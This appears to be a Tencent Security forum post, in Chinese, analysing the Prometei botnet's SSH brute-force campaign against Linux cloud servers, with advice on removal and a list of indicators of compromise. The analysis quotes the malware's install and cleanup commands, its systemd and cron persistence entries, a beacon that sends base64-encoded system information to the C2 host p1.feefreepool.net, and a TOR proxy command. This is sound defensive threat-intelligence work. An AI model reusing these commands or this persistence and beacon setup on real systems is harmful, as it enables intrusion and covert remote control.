本帖最后由 腾讯电脑管家 于 2020-12-14 23:18 编辑
一、概述腾讯主机安全(云镜)检测到Prometei僵尸网络针对云服务器的攻击行动。该僵尸网络于2020年7月被发现,初期主要以SMB、WMI弱口令爆破和SMB漏洞(如永恒之蓝漏洞)对Windows系统进行攻击传播。
腾讯安全威胁情报中心发现该僵尸网络于2020年12月3日启用了针对Linux系统的攻击,此次攻击行动通过SSH弱口令爆破登陆服务器,然后安装僵尸木马/usr/sbin/uplugplay,uplugplay,再通过安装定时任务和系统服务进行持久化。从而持续与C2服务器通信,并尝试根据C2指令启动挖矿程序。 腾讯安全专家建议企业用户按照以下方式对服务器进行检查并删除相关项,同时修改SSH认证方式为强密码。
文件 /usr/sbin/uplugplay /etc/uplugplay /etc/CommId
进程 ./uplugplay sh -c /usr/sbin/uplugplay -Dcomsvc /usr/sbin/uplugplay -Dcomsvc
定时任务:
系统服务: /etc/systemd/system/multi-user.target.wants/uplugplay.service -> /usr/lib/systemd/system/uplugplay.service
腾讯安全系列产品应对Prometei僵尸网络的响应清单:
二、详细分析Prometei僵尸网络病毒通过SSH(22端口)Root账号弱口令爆破入侵,然后下载脚本upnpsetup进行安装: bash -c sudo /tmp/upnpsetup
接着清除安装文件: bash -c cat /etc/os-release&cat /etc/redhat-release&rm /tmp/upnpsetup&rm ./upnpsetup
安装脚本释放核心木马文件:/usr/sbin/uplugplay Uplugplay将自身安装为systemd服务随系统启动: /etc/systemd/system/multi-user.target.wants/uplugplay.service -> /usr/lib/systemd/system/uplugplay.service
服务描述: [Unit]
Description=UPlugPlay
After=multi-user.target
[Service]
Type=forking
ExecStart=/usr/sbin/uplugplay
[Install]
WantedBy=multi-user.target Uplugplay将自身安装为cron定时任务,在开机时运行: @reboot /usr/sbin/uplugplay -cron 木马上线后首先向服务器请求命令,服务器返回“sysinfo”,即让受控机上传系统信息。
与C2服务器的通信可通过HTTP进行,命令和命令执行结果使用被感染计算机上生成的密钥使用RC4加密进行传输。RC4密钥通过HTTP共享,通过保存在僵尸木马的数据块中的公共密钥进行加密,然后经过base64编码字符串后保存在enckey参数中。 GET i-bin/prometei.cgi?add=aW5mbyB7DQp2Mi44NlhfVW5peDY0DQprYWxpLTAwMQ0KDQoxeCBJbnRlbChSKSBDb3JlKFRNKSBpNy00NzkwIENQVSBAIDMuNjBHSHoNCg0KSW50ZWwgQ29ycG9yYXRpb24NCjQ0MEJYIERlc2t0b3AgUmVmZXJlbmNlIFBsYXRmb3JtDQoNCg0KS2FsaSBHTlUvTGludXggUm9sbGluZyAmIDIwMTguMiANCg0KL3Vzci9zYmluLw0KIDE1OjU0OjEwIHVwIDQ3IG1pbiwgIDEgdXNlciwgIGxvYWQgYXZlcmFnZTogMC41NiwgMC4zMiwgMC4yNg0KTGludXgga2FsaS0wMDEgNC4xNS4wLWthbGkyLWFtZDY0ICMxIFNNUCBEZWJpYW4gNC4xNS4xMS0xa2FsaTEgKDIwMTgtMDMtMjEpIHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=607QY1J44NY88E14&h=kali-001&enckey=F5mGmixSHYDjcbmAJfOmEXB76jhOuJma/mH6rLvvDgqAscm+TJxiD79QBabODgF868YiMCDR0oIK4k7mdIg/yUY63Ax1Gpsuk2qFvK0kmNLjNbFFzRkDzKlfwvkzUIZMDDfYooUqBcDyL06TjzYOAQoGkrgm60CKqeQFyeR4bpE= HTTP/1.0 Host: p1.feefreepool.net
请求回传感染用户机器信息,相关信息被base64编码后附加在参数add中,包括操作系统版本、用户名、CPU类型、CPU频率、木马所在路径、木马启动时间,格式如下: info {
v2.86X_Unix64
kali-001
1x Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz
Intel Corporation
440BX Desktop Reference Platform
Kali GNU/Linux Rolling & 2018.2
/usr/sbin/
15:54:10 up 47 min, 1 user, load average: 0.56, 0.32, 0.26
Linux kali-001 4.15.0-kali2-amd64 #1 SMP Debian 4.15.11-1kali1 (2018-03-21) x86_64 GNU/Linux
} 之后僵尸木马程序进入接收C2服务器的指令并执行的循环中,支持以下功能的执行,对感染机器进行远程控制: exec:执行一个程序 sysinfo:查询被感染系统的机器信息 quit:退出僵尸木马进程 quit2:退出僵尸木马处理命令循环,不退出进程 touch:修改文件一个字节,从而改变检验值和生成时间 set_cc0/set_cc1:设置一个新的C2服务地址 extip:获取僵尸网络外部的IP地址 xwget:下载文件,并将文件每个字节通过XOR运算 wget:下载文件 start_mining:启动挖矿程序 stop_mining:停止挖矿程序 updatev4:下载更新僵尸木马
僵尸木马与C2服务器的通信命令如下: 与C2服务器的通信直接通过HTTP,TOR代{过}{滤}理进行,可能还存在名为smcard、libssl、libevent、libcrypto的代{过}{滤}理方式。其中使用的/usr/sbin/msdtc文件主要目的是通过TOR将请求代{过}{滤}理到C2服务器https[:]//gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi。 执行代{过}{滤}理请求命令: /usr/sbin/msdtc aHR0cHM6Ly9nYjduaTVyZ2VleGRjbmNqLm9uaW9uL2NnaS1iaW4vcHJvbWV0ZWkuY2dpP3I9NSZpPU82RU00UUNPNTAzNlRSQzQ= Base64解码命令:
IOCsIP 178.32.52.248 Md5 Uplugplay ed3532ffbcfd91585568635eb6d4a655 Domain mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p gb7ni5rgeexdcncj.onion p1.feefreepool.net dummy.zero C2: p1.feefreepool.net URL http[:]//178.32.52.248/dwn.php http[:]//mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi https[:]//gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi http[:]//p1.feefreepool.net/cgi-bin/prometei.cgi http[:]//dummy.zero/cgi-bin/prometei.cgi
参考链接:https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html
|